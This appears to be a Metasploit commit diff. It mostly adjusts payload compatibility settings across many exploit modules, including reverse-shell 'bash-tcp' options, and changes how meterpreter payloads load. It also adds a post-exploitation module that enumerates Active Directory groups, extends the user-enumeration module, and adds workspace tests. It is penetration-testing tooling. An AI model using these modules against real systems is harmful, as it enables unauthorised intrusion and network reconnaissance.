# - CUPS version 1.4.3 on Ubuntu 10.04 (x86)

2
modules/exploits/multi/http/git_client_command_exec.rb
View File

@ -69,7 +69,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl bash'
'RequiredCmd' => 'generic bash-tcp perl'
}
}
}

2
modules/exploits/multi/http/moodle_cmd_exec.rb
View File

@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],

2
modules/exploits/multi/http/openmediavault_cmd_exec.rb
View File

@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],

2
modules/exploits/multi/http/phptax_exec.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
'RequiredCmd' => 'generic perl ruby telnet python'
}
},
'Platform' => %w{ linux unix },

2
modules/exploits/multi/http/snortreport_exec.rb
View File

@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => %w{ linux unix },

2
modules/exploits/multi/http/zabbix_script_exec.rb
View File

@ -35,7 +35,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],

2
modules/exploits/multi/misc/hp_vsa_exec.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet bash'
'RequiredCmd' => 'generic perl telnet'
}
},
'DefaultOptions' =>

4
modules/exploits/osx/browser/software_update.rb
View File

@ -33,8 +33,8 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash telnet bash-tcp',
}
},
'Platform' => 'osx',

2
modules/exploits/osx/email/mailapp_image_exec.rb
View File

@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'PayloadCompat' => {
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
}
],

2
modules/exploits/unix/dhcp/bash_environment.rb
View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash telnet ruby',
'RequiredCmd' => 'generic telnet ruby',
}
},
'Targets' => [ [ 'Automatic Target', { }] ],

2
modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic gawk bash python perl'
'RequiredCmd' => 'generic gawk python perl'
}
},
'Targets' =>

2
modules/exploits/unix/http/ctek_skyrouter.rb
View File

@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
'RequiredCmd' => 'generic perl telnet netcat netcat-e',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Targets' =>

4
modules/exploits/unix/misc/distcc_exec.rb
View File

@ -38,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet openssl',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',
}
},
'Targets' =>

4
modules/exploits/unix/misc/spamassassin_exec.rb
View File

@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/smtp/clamav_milter_blackhole.rb
View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/smtp/exim4_string_format.rb
View File

@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/awstats_configdir_exec.rb
View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python telnet bash-tcp',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/awstats_migrate_exec.rb
View File

@ -39,8 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/awstatstotals_multisort.rb
View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/barracuda_img_exec.rb
View File

@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 4000,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/webapp/basilic_diff_exec.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
'RequiredCmd' => 'generic perl ruby python telnet'
}
},
'Targets' =>

2
modules/exploits/unix/webapp/cacti_graphimage_exec.rb
View File

@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/dogfood_spell_exec.rb
View File

@ -41,8 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' => [ ['Automatic', { }], ],

2
modules/exploits/unix/webapp/foswiki_maketext.rb
View File

@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet'
'RequiredCmd' => 'generic ruby python telnet'
}
},
'Platform' => [ 'unix' ],

4
modules/exploits/unix/webapp/generic_exec.rb
View File

@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
View File

@ -37,8 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 4000,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet netcat netcat-e',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/guestbook_ssi_exec.rb
View File

@ -39,8 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => %w{ linux unix win },

2
modules/exploits/unix/webapp/mitel_awc_exec.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Targets' => [ ['Automatic', { }], ],

2
modules/exploits/unix/webapp/nagios3_statuswml_ping.rb
View File

@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '<>',
'Compat' =>
{
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' =>

2
modules/exploits/unix/webapp/nagios_graph_explorer.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python ruby bash telnet',
'RequiredCmd' => 'generic perl python ruby telnet',
}
},
'Platform' => ['unix'],

2
modules/exploits/unix/webapp/narcissus_backend_exec.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash netcat netcat-e'
'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
},
'Targets' =>
[

2
modules/exploits/unix/webapp/opensis_modname_exec.rb
View File

@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python',
'RequiredCmd' => 'generic telnet netcat netcat-e perl ruby python',
}
},
'DefaultOptions' =>

2
modules/exploits/unix/webapp/php_charts_exec.rb
View File

@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python',
'RequiredCmd' => 'generic telnet netcat netcat-e perl ruby python',
}
},
'DefaultOptions' =>

4
modules/exploits/unix/webapp/phpbb_highlight.rb
View File

@ -41,8 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',

4
modules/exploits/unix/webapp/qtss_parse_xml_exec.rb
View File

@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/webapp/skybluecanvas_exec.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
'RequiredCmd' => 'generic perl ruby telnet python'
}
},
'Platform' => %w{ unix },

4
modules/exploits/unix/webapp/squirrelmail_pgp_plugin.rb
View File

@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' =>

4
modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb
View File

@ -38,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/webapp/twiki_maketext.rb
View File

@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet'
'RequiredCmd' => 'generic ruby python telnet'
}
},
'Platform' => [ 'unix' ],

2
modules/exploits/unix/webapp/vicidial_manager_send_cmd_exec.rb
View File

@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'PayloadType' => 'cmd',
# Based on vicibox availability of binaries
'RequiredCmd' => 'generic perl python awk bash telnet nc openssl',
'RequiredCmd' => 'generic perl python awk telnet nc openssl',
}
},
'Targets' =>

2
modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',

2
modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb
View File

@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl',
},
},
'Targets' =>

2
modules/payloads/singles/java/shell_reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 7351
CachedSize = 7359
include Msf::Payload::Single
include Msf::Payload::Java

5
modules/payloads/singles/php/meterpreter_reverse_tcp.rb
View File

@ -31,10 +31,7 @@ module Metasploit4
end
def generate
file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
met = File.open(file, "rb") {|f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']

2
modules/payloads/stagers/java/bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 5097
CachedSize = 5105
include Msf::Payload::Stager
include Msf::Payload::Java

2
modules/payloads/stagers/java/reverse_http.rb
View File

@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 5115
CachedSize = 5123
include Msf::Payload::Stager
include Msf::Payload::Java

2
modules/payloads/stagers/java/reverse_https.rb
View File

@ -9,7 +9,7 @@ require 'msf/core/payload/uuid/options'
module Metasploit3
CachedSize = 5924
CachedSize = 5932
include Msf::Payload::Stager
include Msf::Payload::Java

2
modules/payloads/stagers/java/reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 5110
CachedSize = 5118
include Msf::Payload::Stager
include Msf::Payload::Java

6
modules/payloads/stages/php/meterpreter.rb
View File

@ -25,11 +25,7 @@ module Metasploit4
end
def generate_stage(opts={})
file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
met = File.open(file, "rb") { |f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
uuid = opts[:uuid] || generate_payload_uuid
bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')

6
modules/payloads/stages/python/meterpreter.rb
View File

@ -27,11 +27,7 @@ module Metasploit3
end
def generate_stage(opts={})
file = ::File.join(Msf::Config.data_directory, 'meterpreter', 'meterpreter.py')
met = ::File.open(file, 'rb') {|f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")

97
modules/post/windows/gather/enum_ad_groups.rb Normal file
View File

@ -0,0 +1,97 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex'
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::Windows::LDAP
# include Msf::Post::Windows::Accounts
USER_FIELDS = ['name',
'distinguishedname',
'description'].freeze
def initialize(info = {})
super(update_info(
info,
'Name' => 'Windows Gather Active Directory Groups',
'Description' => %{
This module will enumerate AD groups on the specified domain.
},
'License' => MSF_LICENSE,
'Author' => [
'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options([
OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]),
], self.class)
end
def run
@user_fields = USER_FIELDS.dup
if datastore['ADDITIONAL_FIELDS']
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',')
@user_fields.push(*additional_fields)
end
max_search = datastore['MAX_SEARCH']
begin
q = query('(objectClass=group)', max_search, @user_fields)
rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
# Can't bind or in a network w/ limited accounts
print_error(e.message)
return
end
if q.nil? || q[:results].empty?
print_status('No results returned.')
else
results_table = parse_results(q[:results])
print_line results_table.to_s
end
end
# Takes the results of LDAP query, parses them into a table
# and records and usernames as {Metasploit::Credential::Core}s in
# the database.
#
# @param [Array<Array<Hash>>] the LDAP query results to parse
# @return [Rex::Ui::Text::Table] the table containing all the result data
def parse_results(results)
domain = datastore['DOMAIN'] || get_domain
domain_ip = client.net.resolve.resolve_host(domain)[:ip]
# Results table holds raw string data
results_table = Rex::Ui::Text::Table.new(
'Header' => "Domain Groups",
'Indent' => 1,
'SortIndex' => -1,
'Columns' => @user_fields
)
results.each do |result|
row = []
result.each do |field|
if field.nil?
row << ""
else
row << field[:value]
end
end
results_table << row
end
results_table
end
end

14
modules/post/windows/gather/enum_ad_users.rb
View File

@ -13,6 +13,7 @@ class Metasploit3 < Msf::Post
UAC_DISABLED = 0x02
USER_FIELDS = ['sAMAccountName',
'name',
'userPrincipalName',
'userAccountControl',
'lockoutTime',
@ -26,12 +27,16 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Active Directory Users',
'Description' => %{
This module will enumerate user accounts in the default Active Domain (AD) directory and stores
them in the database.
them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of
that group by performing a recursive/nested search (i.e. it will list users who are members of
groups that are members of groups that are members of groups (etc) which eventually include the
target group DN.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell',
'Carlos Perez <carlos_perez[at]darkoperator.com>'
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
@ -42,6 +47,7 @@ class Metasploit3 < Msf::Post
OptBool.new('EXCLUDE_LOCKED', [true, 'Exclude in search locked accounts..', false]),
OptBool.new('EXCLUDE_DISABLED', [true, 'Exclude from search disabled accounts.', false]),
OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]),
OptString.new('GROUP_MEMBER', [false, 'Recursively list users that are effectve members of the group DN specified.', nil]),
OptEnum.new('UAC', [true, 'Filter on User Account Control Setting.', 'ANY',
[
'ANY',
@ -58,7 +64,7 @@ class Metasploit3 < Msf::Post
@user_fields = USER_FIELDS.dup
if datastore['ADDITIONAL_FIELDS']
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',')
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',')
@user_fields.push(*additional_fields)
end
@ -131,7 +137,6 @@ class Metasploit3 < Msf::Post
results_table
end
# Builds the LDAP query 'filter' used to find our User Accounts based on
# criteria set by user in the Datastore.
#
@ -140,6 +145,7 @@ class Metasploit3 < Msf::Post
inner_filter = '(objectCategory=person)(objectClass=user)'
inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED']
inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED']
inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER']
case datastore['UAC']
when 'ANY'
when 'NO_PASSWORD'

60
spec/lib/msf/ui/console/command_dispatcher/db_spec.rb
View File

@ -535,6 +535,65 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
end
describe "#cmd_workspace" do
before(:each) do
db.cmd_workspace "-D"
@output = []
end
describe "<no arguments>" do
it "should list default workspace" do
db.cmd_workspace
@output.should =~ [
"* default"
]
end
it "should list all workspaces" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace
@output.should =~ [
" default",
"* foo"
]
end
end
describe "-a" do
it "should add workspaces" do
db.cmd_workspace("-a", "foo", "bar", "baf")
@output.should =~ [
"Added workspace: foo",
"Added workspace: bar",
"Added workspace: baf"
]
end
end
describe "-d" do
it "should delete a workspace" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace("-d", "foo")
@output.should =~ [
"Deleted workspace: foo",
"Switched workspace: default"
]
end
end
describe "-D" do
it "should delete all workspaces" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace("-D")
@output.should =~ [
"Deleted and recreated the default workspace",
"Deleted workspace: foo",
"Switched workspace: default"
]
end
end
describe "-h" do
it "should show a help message" do
db.cmd_workspace "-h"
@ -544,6 +603,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
" workspace [name] Switch workspace",
" workspace -a [name] ... Add workspace(s)",
" workspace -d [name] ... Delete workspace(s)",
" workspace -D Delete all workspaces",
" workspace -r <old> <new> Rename workspace",
" workspace -h Show this help information"
]

4
spec/support/shared/contexts/msf/ui_driver.rb
View File

@ -9,6 +9,10 @@ shared_context 'Msf::UIDriver' do
@output ||= []
@output.concat string.split("\n")
end
driver.stub(:print_status).with(kind_of(String)) do |string|
@output ||= []
@output.concat string.split("\n")
end
driver.stub(:print_error).with(kind_of(String)) do |string|
@error ||= []
@error.concat string.split("\n")